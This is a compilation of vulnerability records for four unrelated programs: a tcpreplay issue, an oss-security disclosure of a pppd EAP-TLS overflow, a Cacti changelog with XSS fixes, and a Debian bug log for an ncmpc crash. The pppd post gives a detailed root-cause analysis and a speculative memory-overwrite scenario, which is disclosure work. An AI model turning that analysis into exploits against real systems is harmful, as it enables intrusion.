This is similar to #484. In this case, declared captured length is huge (837240390) but snaplen is only 4 so that libpcap truncates the packets to 4 bytes and sets `pkthdr->caplen` accordingly. The problem is `get_l2len()` not checking there is enough data for ethernet header.

AFAICS this has been fixed in branch 4.3 by commit 0253c47 (but the fix is missing in master branch). This commit is already in v4.3.0-beta1 so the CVE text is probably wrong unless they mean a different bug.

![@fklassen](https://avatars.githubusercontent.com/u/1899327?s=88&u=02e835107c1ca0ac17f954825c1c44ef7456c3d5&v=4)

Duplicate of #408. Fixed in version 4.3.

4.3 automation moved this from **In progress** to **Done**

Oct 18, 2018

CVE-2018-13112: heap-buffer-overflow in /src/common/get.c:174 function get_l2len · Issue #477 · appneta/tcpreplay

Improper input validation together with an integer overflow in the EAP-TLS protocol implementation in PPPD may cause a crash, information disclosure, or authentication bypass. This implementation is distributed as a patch for PPPD 0.91, and includes the affected eap.c and eap-tls.c files. Configurations that use the `refuse-app` option are unaffected.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Mon, 11 Jun 2018 14:57:16 -0400
From: Luciano Bello <luciano@...ian.org>
To: oss-security@...ts.openwall.com
Cc: team@...urity.debian.org
Subject: Buffer Overflow in pppd EAP-TLS implementation

- Software: pppd, in particular the EAP-TLS patch\[1\]

- Summary: Several buffer overflows can be trigger even when pppd is not
configured to take EAP-TLS (but the binary was patched with the
extension).

- CVE: CVE-2018-11574

- Credit:
Ivan Gotovchits <ivg@...e.org>, from Carnegie Mellon University Binary
Analysis Team

- Background:
We, the Debian security team, received the report and contacted the
package maintainer and upstream. Upstream and submitter work together to
agree a patch.

- Patch:
attached.

- Relevant parts of the original report:


We would like to report a security vulnerability that we have discovered
in the EAP-TLS patch for pppd \[1\]. Improper input validation together
with an integer overflow may cause a crash on both sides and, unlikely,
may lead to the information disclosure or authentication bypass.

Detailed Description
===============

Context
-----------

The \`eaptls\_receive\` function (eap-tls.c) is used to process data passed
via the ppp channel. It is used on both peer and authenticator sides and
is tasked to process and accumulate fragmented messages and pass them to
the SSL backend for the authentication. The message format is described
in RFC 5216. The \`eaptls\_receive\` function is called by \`eap\_response\`
(eap.c) and \`eap\_request\` (eap.c), which implement the \`input\` method
of the EAP protocol, that is invoked in the \`get\_input\` (main.c)
procedure, when the EAP protocol is enabled.

Problem Description
---------------------------

The EAP TLS protocol uses packages with variable lengths and passing a
short package message will result in the out-of-bounds read (CWE-125)
and calling \`memcpy\` with a negative length parameter will lead to the
buffer overread (CWE-126), as well as the buffer overflow (CWE-122).
Details, follow.

The \`eaptls\_receive\` function is called with three parameters, the
session pointer \`ets\`, the pointer \`inp\` to the buffer that contains
data received by the ppp channel, and the length \`len\` of this buffer.
The \`len\` parameter is a signed \`int\`.

Under all paths that reach this point, the constraint on the \`len\`
parameter is \`len >= 0\`, i.e., all checks before the invocation only
verify that the message is long enough to be dispatched. Every check
advances the pointer and decrements the length. For example,

     - main.c:1048-1058 // ensures that len was at least 4
     - eap.c:2077-2083  // ensures that len was at least 1

There are no checks of the \`len\` parameter in the \`eaptls\_receive\`
function at all. The very first operation (eap-tls.c:804) in the
function is to read the flags field, that is not guaranteed to be
present, as \`len\` could be \`0\` here.  There are few more unbounded reads
at \`eap-tls.c:812\` and \`eap-tls.c:838\`. Each read is accompanied with
the corresponding decrementation of the length parameter. Thus, in case
of a short package, the length could have a negative value (anything
between -1 and -5). The check \`!(len + ets->datalen > etc->tlslen)\` is
passed easily since \`len\` is negative, thus the \`memcpy\` call
(obfuscated with the BCOPY macro) will receive the negative \`len\`
parameter, that will most likely result in the segmentation fault and a
crash of the server or client.


More Advanced Scenarios
-----------------------------------

We're hypothesizing, that instead of crashing the daemon it is
theoretically possible to overwrite server memory structures, during the
buffer-overflow in \`memcpy\` in such way that it will change the state of
authentication FSM to a more advanced state (e.g., to the authenticated
state). To achieve this, an adversary may rely on the Session Resumption
mechanism (RFC 5216, section 2.1.2), create the first session and put it
on hold, then create several other sessions and fill in the memory of
the server until the brk raises till the 4Gb bar (the \`len\` parameter is
32 bit in x86 and x86-64), then the first session could be resumed, and
the \`memcpy\` won't cause the segmentation fault, but overwrite internal
structures of the server.

We did not investigate this scenario any further.


Further Details
--------------------

The vulnerability was detected using the Memcheck verification tool of
the Primus Microexecution Framework (a part of the CMU Binary Analysis
Framework \[2\]). We ran it on a vanilla \`pppd\` binary as shipped in
Ubuntu Xenial. All source code references are made on the patched source
obtained with \`apt-source\`. Primus runs a program in the emulated
environment. A reduced trace showing the problem is attached (in IDA Pro
format and in plain-text)

**View attachment "**ppp-2.4.7-eaptls-mppe-1.101a.patch**" of type "**text/x-patch**" (88939 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2018-11574: security - Buffer Overflow in pppd EAP-TLS implementation

Cacti before 1.1.37 has XSS because it makes certain htmlspecialchars calls without the ENT_QUOTES flag (these calls occur when the html_escape function in lib/html.php is not used).

Type

ID

Text

feature

Add a Timeout setting for Remote Agent calls

feature

Add Graphs and Data Sources hyperlinks on Device page

feature

Add One Minute Sampling to the default Data Source Profiles

feature

Add support for DDERIVE and DCOUNTER to Cacti

feature

Add Timezone support for Remote Data Collectors

feature

Allow Adding Aggregate Graphs to a Report

feature

Allow ASCII filepath paths to not be found on settings save

feature

Allow drill down from Graphs to Data Queries or Templates

feature

Allow Import/Export to be hookable

feature

Allow snmpagent to be disabled for very large installs

feature

Allow Top tabs to be Glyphs or Text or both

feature

Big Spanish translation update plus massive QA fixes

feature

Change password page provides visible confirmation of password rules

feature

Do not allow second data source to be added to an SNMP Get data template

feature

Don't allow removal of Data Sources from Data Template once its in use

feature

Inform the primary Cacti administrator of problems by Email

feature

Make all user settings dynamic and allow resetting to default.

feature

Make Graph and Data Source suggested naming more efficient

feature

Make it easy to find Data Query based graphs that have lost indexes

feature

Make Top Tabs use Ajax Callback

feature

Make tree editing responive

feature

New Install/Upgrade user permission to limit access to being able to upgrade

feature

Provide option to debug width errors where output exceeds column width

feature

Removed the Authentication Method of 'None'

feature

Tree automation is now defaulted to on for new install

feature

Update JavaScript library c3.js to version 0.6.8

feature

Update JavaScript library Chart.js to 2.7.3

feature

Update JavaScript library d3.js to version 5.7.0

feature

Update JavaScript library jquery.js to 3.3.1

feature

Update JavaScript library jquery-migrate.js to 3.0.1

feature

Update JavaScript library jquery.tablesorter.js to version 2.30.7

feature

Update JavaScript library jstree.js to 3.3.7

feature

Update JavaScript library screenfull.js to 3.3.3

feature

Update phpmailer to version 6.0.6

feature

Update phpseclib to version 2.0.13

feature

289

Allow external nologin access for Realtime Graphs

feature

553

When display a host, include Aggregated Graphs as well as standard graphs

feature

614

Allow users to duplicate Data Input Methods

feature

973

When creating a new user authenticated via LDAP, attempt to retrieve users email and full name

feature

122

Support a Site Branch Type

feature

1060

Design Enhancement for Large scale Cacti Implementations

feature

1142

Add Site dropdown to the Graphs and Data Source pages

feature

1184

Improve Data Input Methods editability and message handling

feature

1200

Aggregate Graphs can now include COMMENT

feature

1282

Email notification for Automation Network discovery process

feature

1347

Update automation logging to work better

feature

1395

Ensure messages have each new line keep the same prefix in cacti\_log()

feature

1399

Allow 'requires' to include version against a plugin

feature

1400

User settings are now dynamic and can be reset (removed) to return to global settings

feature

1422

Automatically select the next unused data input field when clicking add on data input method

feature

1505

When displaying a graph, provide breadcrumb link to edit device

feature

1527

Update Fontawesome from 4.7 to 5.0.10

feature

1580

Support Drag & Drop for Builtin Report Items

feature

1581

Allow Mass Adding of Graphs to Reports

feature

1584

Allow theme selection when installing

feature

1588

Check that PHP can run a test file

feature

1593

Allow External links to auto refresh

feature

1597

Ensure synchronised files have same attributes as originals

feature

1610

On Unix, redirect error messages to log files when running external scripts

feature

1628

Allow the User to define an initial Automation Network for discovery when installing

feature

1670

Improve Graph Management to show type of source for a graph

feature

1671

When duplicating a Graph Template, properly duplicate Data Query Graph Template Mappings

feature

1677

Default Tree nodes sorting to be inherited

feature

1691

On Graph context menu, add a 'Copy graph' option to copy graph image

feature

1692

Separate option for logging Input Validation issues

feature

1703

On Graph context menu, text is now multi-lingual

feature

1708

Allow the User to override global Automation email recipients at the Automation Network level

feature

1709

Suppress warning from RRDTool when attempting to make updates in the past

feature

1711

Add support for SSL connections to MySQL

feature

1731

Prevent loss of changes by warning user about unsaved items

feature

1734

When displaying a graph, provide more information when error image is displayed (see also #1428)

feature

1763

Enable automatic refresh for Time Graph View

feature

1806

Control low level debug routines via config.php (Develoepr Use)

feature

1819

Provide CLI program to enable graphs to be removed by scripts

feature

1969

Graph previews can now be linked using a host's external id

feature

2006

Introduce new Data Source Profile to handle decade long graphs

feature

2173

Introduce Device and Graph Template Caching to Speed UI

feature

2228

Add Device ID to Device search field

issue

Fix issue with display\_custom\_error\_message() causing problem with system error message handling

issue

Graph List View was not fully responsive

issue

Move Graph removal function to Graph API

issue

On the Data Sources page, if there is no filtered Device and a Data Source is edited, device association is lost

issue

Typo in Dutch translations when an error occurred while downgrading

issue

Unable to display user profile tabs

issue

Verify all Fields not working due to Cacti 1.x upgrade error

issue

186

Cacti does not support jQueryUI 1.12.x

issue

187

Remove the use of jQuery Migrate plugin

issue

948

Do not create a new datasource when adding a new Graph for the same device/field

issue

454

Cacti Re-Index does not resolve index changes properly during re-index

issue

983

Import Template Preview is misleading

issue

1097

When copying template user, newly created user should always be enabled to allow logging in

issue

1097

When copying template user, it should be disable to prevent logging in as template user directly

issue

1174

When display a tree, disable drag and drop unless in edit mode

issue

1298

Display fatal error to prevent issues caused when system log is not writable

issue

1350

When switching an Automation Tree Rule's leaf type, remove invalid Automation Rule Items

issue

1383

CSRF Timeout does not obey session timeout

issue

1408

Update SQL / Backtrace to use new clean\_up\_lines() function

issue

1414

DSSTATS reports incorrectly that a data source does not exist

issue

1420

Fix issues found by Debian package builds

issue

1421

Fix issue when SQL had all bad modes, missing variable warning was generated

issue

1426

Fix issue where remote poller was not using unique filenames when attempting to verify files

issue

1437

Plugin install hover message sometimes shows line breaks rather than formatted text

issue

1454

When using oid\_regexp\_parse, filter indexes to those that match

issue

1473

Recovery Date overwritten by subsequent checks

issue

1494

Unable to Deep Link/Bookmark Trees

issue

1503

Undefined function clearstatscache in DSSTATS

issue

1507

When saving graph settings from the graph page, the graph template id should not be included

issue

1510

New Graphs Undefined Variable $graph\_template\_name

issue

1521

Force boost to be enabled when there are Remote Data Collectors

issue

1528

Saving a device can result in WARNINGS related to string vs array handling

issue

1529

Allow Aggregate Graphs to Sum Bandwidth and Percentile COMMENTS

issue

1543

Graph Preview appends header=false too many times

issue

1553

Poller does not set rrd\_step\_counter correctly if no steps taken

issue

1559

CLI Output Issues due to over escaping

issue

1560

Warning that escapeshellarg() is escaping a null

issue

1567

Technical support - add notification if Cacti and Spine version is different

issue

1574

User templates are not correctly being applied

issue

1589

Installer now checks that the temporary folder is writable

issue

1590

User Admin generates SQL error if user is not part of any groups

issue

1601

Aggregate Graphs can not include some classes of COMMENT

issue

1602

PHP ERROR: Call to undefined function api\_data\_source\_cache\_crc\_update()

issue

1604

Failed to connect to remote collector

issue

1606

Boost debug log not functional

issue

1607

Boost next run time occurs in the past

issue

1608

Possible boost race conditions

issue

1609

Remote pollers update 'stats\_poller' on main poller

issue

1617

Editing a data query results in missing $header variable

issue

1621

Realtime Popup can cause automatic logout

issue

1626

httpd-error.log have message about Fontconfig

issue

1634

Default snmp quick print setting resulting in false poller ASSERTS on some php releases

issue

1651

Check temporary folder has write access during import

issue

1655

Correct Cacti to handle new MySQL 8.0 reserved word \`system\`

issue

1658

Devices drop down should be filtered by Site

issue

1660

Reports based upon Tree don't maintain graph order

issue

1665

Must change password not working for local users when main realm is not local

issue

1669

Console log header grammar issue

issue

1674

Threads and Processes values not migrated to Poller table during upgrade

issue

1676

Allow automation discovery to add the same sysname on different hosts

issue

1682

Slow Select Statement lib/api\_automation.php

issue

1689

Technical Support's RRDTool version should show detected RRD version

issue

1690

Report a warning if the default collation is not utf8mb4\_unicode\_ci

issue

1700

Mail sent without auth causes errors to appear in logs

issue

1710

RRDtool create command causes first update to fail

issue

1721

Console Side Bar not correct on first login

issue

1723

die() messages should include PHP\_EOF for better logging

issue

1726

Poor page performance editing a Graphs Graph Items

issue

1746

Poller with no hosts does not exit until timeout is reached

issue

1761

Graph Management page shows bogus template names

issue

1783

Browser Back button still does not working

issue

1796

Import: Fixed handling of references to objects not included in file

issue

1799

Default User log sort should be date descending

issue

1810

Correct SQL errors with authentication set to no authentication

issue

1839

Dummy cosmetic bug on down device selection option

issue

1841

Data Source Stats table not properly migrated from pre 1.x Cacti plugin

issue

1849

SNMPAgent not sending traps

issue

1852

Reports Preview/Mails show no graphs

issue

1889

Insecure $ENV{ENV} which running setgid

issue

1901

Upgrade from 0.8.8h fails on external\_links statement

issue

1921

Data Query XML field method 'rewrite\_index' does not correctly query for value

issue

1926

Deselecting items should present warning or disable GO button

issue

1948

Device Template should warn about need to re-sync

issue

1953

set\_default\_action() should warn if more than one action provided

issue

1973

SpikeKill Menu does not display properly

issue

1976

Default admin permissions do not allow everything

issue

1982

Certain hooks should occur within api functions rather than UI functions

issue

2002

api\_plugin\_db\_table\_create should support non-string defaults

issue

2012

For kernel 3.2+, "Linux - Memory - Free" should grep for "MemAvailable:", not "MemFree:"

issue

2085

CLOG Regex Parser does not verify registered function exists

issue

2126

api\_device.php generates undefined function poller\_push\_to\_remote\_db\_connect()

issue

2127

Unable to save error when duplicating graph

issue

2135

api\_tree\_lock() and api\_tree\_unlock() forcing redirection incorrectly

issue

2143

export.php Illegal string offset 'method'

issue

2144

Device Management "Status" column does not sort properly

issue

2152

When editing a device, should show disable/enable option

issue

2153

Utilities page issues the wrong hook for tabs

issue

2163

LDAP functions are not consistent

issue

2164

Login page does not remember selected realm

issue

2171

datepicker and timepick translation not available

issue

2178

Header/Footer included more than once

issue

2182

Graph View missing 'html\_graph\_template\_multiselect()' function

issue

2184

html\_host\_filter() does not handle host\_id consequently

issue

2186

Boost generates invalid SQL during on demand update

issue

2188

SNMP timeout errors are being duplicated

issue

2191

i18n\_themes is not properly primed in global\_arrays.php

issue

2202

Can't create more than one graph with add\_graphs.php from one template

issue

2207

Removing Graph Template does not Remove Data Query Associations

issue

2217

cmd.php not handling quoted snmp values properly

issue

2240

SNMP system Data Input Methods should not be modified on import

issue

2241

Spike removal not functional due to Debian packaging

security

1072

Prevent exploitation of Data Input Methods to escalate privileges (CVE-2009-4112)

security

1882

Bypass output validation in select cases

security

2212

Stored XSS in "Website Hostname" field

security

2213

Stored XSS in "Website Hostname" field - Devices

security

2214

Stored XSS in "Vertical Label" field - Graph

security

2215

Stored XSS in "Name" field - Color

unknown

CVE-2018-10061: The Complete RRDTool-based Graphing Solution

ncmpc through 0.29 is prone to a NULL pointer dereference flaw. If a user uses the chat screen and another client sends a long chat message, a crash and denial of service could occur.

Reported by: Jonathan Neuschäfer <j.neuschaefer@gmx.net>

Date: Tue, 3 Apr 2018 14:51:05 UTC

Severity: normal

Tags: patch, security

Found in versions ncmpc/0.24-1, ncmpc/0.27-1

Fixed in version ncmpc/0.33-1

**Done:** Geoffroy Youri Berret <efrim@azylum.org>

Bug is archived. No further changes may be made.

Toggle useless messages

**Report forwarded** to debian-bugs-dist@lists.debian.org, j.neuschaefer@gmx.net, max@musicpd.org, team@security.debian.org, Sebastian Harl <tokkee@debian.org>:  
Bug#894724; Package ncmpc. (Tue, 03 Apr 2018 14:51:07 GMT) (full text, mbox, link).

**Acknowledgement sent** to Jonathan Neuschäfer <j.neuschaefer@gmx.net>:  
New Bug report received and forwarded. Copy sent to j.neuschaefer@gmx.net, max@musicpd.org, team@security.debian.org, Sebastian Harl <tokkee@debian.org>. (Tue, 03 Apr 2018 14:51:07 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

\[Message part 1 (text/plain, inline)\]

Package: ncmpc
Version: 0.27-1
Severity: normal
Tags: patch security

Hi,

Ncmpc can be crashed when the user uses the chat screen and another
client sends a long chat message, due to a NULL pointer dereference.

I have a patch that fixes this for v0.27 (currently in Debian) and v0.29
(newest upstream release). The bug is fixed in upstream's master branch.

I tagged this report as "security"-related, because the client can be
crashed by the actions of another client, but I don't think this allows
anything more serious than a NULL pointer derefence (probably no RCE).

-- System Information:
Debian Release: buster/sid
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable')
Architecture: amd64 (x86\_64)
Foreign Architectures: i386, mips, armhf, armel

Kernel: Linux 4.15.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en\_US.UTF-8, LC\_CTYPE=en\_US.UTF-8 (charmap=UTF-8), LANGUAGE=en\_US:en (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages ncmpc depends on:
ii  libc6            2.27-2
ii  libglib2.0-0     2.56.0-4
ii  liblirc-client0  0.10.0-2+b1
ii  libmpdclient2    2.11-1
ii  libncursesw5     6.1-1
ii  libtinfo5        6.1-1

ncmpc recommends no packages.

Versions of packages ncmpc suggests:
ii  mpd           0.20.18-1
pn  ncmpc-lyrics  <none>

-- no debconf information

\[chat-crash.patch (text/plain, attachment)\]

**Marked as found in versions ncmpc/0.24-1.** Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Tue, 03 Apr 2018 19:51:08 GMT) (full text, mbox, link).

**Information forwarded** to debian-bugs-dist@lists.debian.org, Sebastian Harl <tokkee@debian.org>:  
Bug#894724; Package ncmpc. (Wed, 04 Apr 2018 04:57:04 GMT) (full text, mbox, link).

**Acknowledgement sent** to Salvatore Bonaccorso <carnil@debian.org>:  
Extra info received and forwarded to list. Copy sent to Sebastian Harl <tokkee@debian.org>. (Wed, 04 Apr 2018 04:57:04 GMT) (full text, mbox, link).

Message #12 received at 894724@bugs.debian.org (full text, mbox, reply):

Control: retitle -1 ncmpc: CVE-2018-9240: Crash in chat screen when another client sends a long line

Hi Jonathan,

On Tue, Apr 03, 2018 at 04:48:23PM +0200, Jonathan Neusch??fer wrote:
> I tagged this report as "security"-related, because the client can be
> crashed by the actions of another client, but I don't think this allows
> anything more serious than a NULL pointer derefence (probably no RCE).

MITRE has assigned CVE-2018-9240 for this issue.

Regards,
Salvatore

**Changed Bug title to 'ncmpc: CVE-2018-9240: Crash in chat screen when another client sends a long line' from 'ncmpc: Crash in chat screen when another client sends a long line'.** Request was from Salvatore Bonaccorso <carnil@debian.org> to 894724-submit@bugs.debian.org. (Wed, 04 Apr 2018 04:57:04 GMT) (full text, mbox, link).

**Added tag(s) pending.** Request was from Florian Schlichting <fsfs@debian.org> to control@bugs.debian.org. (Mon, 07 Jan 2019 22:45:04 GMT) (full text, mbox, link).

**Reply sent** to Geoffroy Youri Berret <efrim@azylum.org>:  
You have taken responsibility. (Mon, 14 Jan 2019 22:51:03 GMT) (full text, mbox, link).

**Notification sent** to Jonathan Neuschäfer <j.neuschaefer@gmx.net>:  
Bug acknowledged by developer. (Mon, 14 Jan 2019 22:51:03 GMT) (full text, mbox, link).

Message #21 received at 894724-close@bugs.debian.org (full text, mbox, reply):

Source: ncmpc
Source-Version: 0.33-1

We believe that the bug you reported is fixed in the latest version of
ncmpc, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 894724@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Geoffroy Youri Berret <efrim@azylum.org> (supplier of updated ncmpc package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 07 Jan 2019 14:55:41 +0100
Source: ncmpc
Binary: ncmpc ncmpc-lyrics
Architecture: source amd64 all
Version: 0.33-1
Distribution: unstable
Urgency: medium
Maintainer: mpd maintainers <pkg-mpd-maintainers@lists.alioth.debian.org>
Changed-By: Geoffroy Youri Berret <efrim@azylum.org>
Description:
 ncmpc      - ncurses-based audio player
 ncmpc-lyrics - ncurses-based audio player (lyrics plugins)
Closes: 894724 896059 902699 916731
Changes:
 ncmpc (0.33-1) unstable; urgency=medium
 .
   \* Enable pgpmode in watch file, add upstream signing key
   \* New upstream release.
     - Fix "CVE-2018-9240 (Closes: #894724)
     - Fix "segfault on bad connection" (Closes: #902699)
     - Fix "Defaults to non-policy-compliant configuration
       file" (Closes: #896059)
   \* Update standards version to 4.3.0.
     Update debhelper to compat 12
     Update upstream Homepage
   \* Update d/rules to build with meson.
     Switch from menu to XDG Desktop file
   \* Refactored copyright (dep-5 machine-interpretable format)
   \* Takeover for the mpd-team (Closes: #916731)
   \* Register html manual with doc-base
Checksums-Sha1:
 2409c04e1484f7e85973d651eee046248824872c 2342 ncmpc\_0.33-1.dsc
 b5bcb49069c6a89e7d05644cecda244c7da4d1be 226344 ncmpc\_0.33.orig.tar.xz
 32878b37a378c1a3607ae82dd789e702f41f5ef4 879 ncmpc\_0.33.orig.tar.xz.asc
 9aa6c7d4881bd09d0734ba700be5972cc7ed2a7c 16344 ncmpc\_0.33-1.debian.tar.xz
 da69f11f76c636ce008f9f01a46fd0d35a2791f4 4774620 ncmpc-dbgsym\_0.33-1\_amd64.deb
 d4a341c28e6c56a8a10e49934adb612836e2c131 13932 ncmpc-lyrics\_0.33-1\_all.deb
 94350fdccb2e4d17e2162c574d090b81f3390251 7996 ncmpc\_0.33-1\_amd64.buildinfo
 aea68d77c2b126c0f727f5e17a550b51925fd5b9 283788 ncmpc\_0.33-1\_amd64.deb
Checksums-Sha256:
 54d82f9cb50c2e1d6dd23990d132c54d46f668badccf089f4c0418c4b0f2bbb8 2342 ncmpc\_0.33-1.dsc
 94e04a34854015aa013b43ec15b578f4541d077cf7ae5bf7c0944475673fd7a5 226344 ncmpc\_0.33.orig.tar.xz
 dc067705e2396cb405bba3d7a1ffdc1fa9db2787cea58476736f483ac17a5d9d 879 ncmpc\_0.33.orig.tar.xz.asc
 a9465edb56a39a5c24421bf69471c91a884a9d7e1b60e9c29321b0f38a6592e0 16344 ncmpc\_0.33-1.debian.tar.xz
 41e5b71c1f7b0b3451b9774cc3a9bd271c8c0f7bda229ef6bc1b7b639375b3c6 4774620 ncmpc-dbgsym\_0.33-1\_amd64.deb
 cf30431c1dd95e4e49a6a9d12f7b22a7dfa23c4df1d14bb17309dd90b800bf04 13932 ncmpc-lyrics\_0.33-1\_all.deb
 26b4c7c6f448cdce742ac75297a99a181b9029102b6d45c72cab5657137c9357 7996 ncmpc\_0.33-1\_amd64.buildinfo
 613f0f8940a547191b5a026cc6749dc366dffa13a1febae69ed701ec09762927 283788 ncmpc\_0.33-1\_amd64.deb
Files:
 a56902d82a975f7afcfc881cafc4a0da 2342 sound optional ncmpc\_0.33-1.dsc
 166394cf1ab645de219bd1d525930343 226344 sound optional ncmpc\_0.33.orig.tar.xz
 8b51e78d4e7aba28ac96363508837be8 879 sound optional ncmpc\_0.33.orig.tar.xz.asc
 42001ea07b36b52bf4359e4279386a84 16344 sound optional ncmpc\_0.33-1.debian.tar.xz
 59007c558ff2baec4d2d47ff4f290bfa 4774620 debug optional ncmpc-dbgsym\_0.33-1\_amd64.deb
 eb0c101afb516168b2d4addcff15c8c7 13932 sound optional ncmpc-lyrics\_0.33-1\_all.deb
 a4128e12201e33eb9189ed6d53c470b5 7996 sound optional ncmpc\_0.33-1\_amd64.buildinfo
 9e0587783ce1078e0d863904842c9a3d 283788 sound optional ncmpc\_0.33-1\_amd64.deb

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEMLI8i05qOwnqprZSEpc7bnLcB7UFAlwzzDYACgkQEpc7bnLc
B7WroQ/7B1rWidi4Pn21bC/4qSk/VCeceTGqeiuC4nM3mqk5H7F09fnWqQ7WuzYe
Biay54BSGQKEuqk9XY948gF5ytxgHh6WPz7ngDwTlDn/7n83ix1mukQs3+u2EbXb
5mCS6SYuJKMrGOKV9caQIHoXOym4HTnKnUclZjC0YEJ0G7jNLu5spk8954bfoKb1
FeaqHWb8jJie7bqph4ES6+annR67L5NJWVNlR1hdiWPIeDy3ZWSoSMIVEHgsfCGm
MML1M6R7YO3sPz5uNvwWtNrm7DooVUZRJ/LCpkb8y4zsVUulK7LXTle2DnRFjxnX
C/b91/yVfe6skYfw1zPuRpqDSKZBEIuLXXCtvgpnl4RAeqBcEjnv08BG4uZ6VOpE
DBF7xmpVv9t5kA4HJk0UheUuFbJ4eK2QTBs/98GXeg+FIpaJKIkxu/+QcplvLqUA
snxHR2AloOFH+MiKn07at7uTwLJlXQE3i0dbIxbdLoKbsoiVlXdkOOZn8q4Q4uNC
yD4yx09hT4xt4rUt6pTtVSyUtE4OebrUtutwAg4KNudFPbZ4T6kbr62MnXG/ZFiY
uQwPXhOBCsb6NCSCqlbgVV76x9bJVqvQoUIerCyCoabnaasBDj40FdlHyQjhaid1
RnfjbjohB89iO21S1OjcN74RNxQKGhnV6MfsHsosyMM5laob4Vk=
=OJrE
-----END PGP SIGNATURE-----

**Bug archived.** Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 18 Feb 2019 07:26:42 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org\>. Last modified: Fri Jan 20 15:32:35 2023; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

Tag

#debian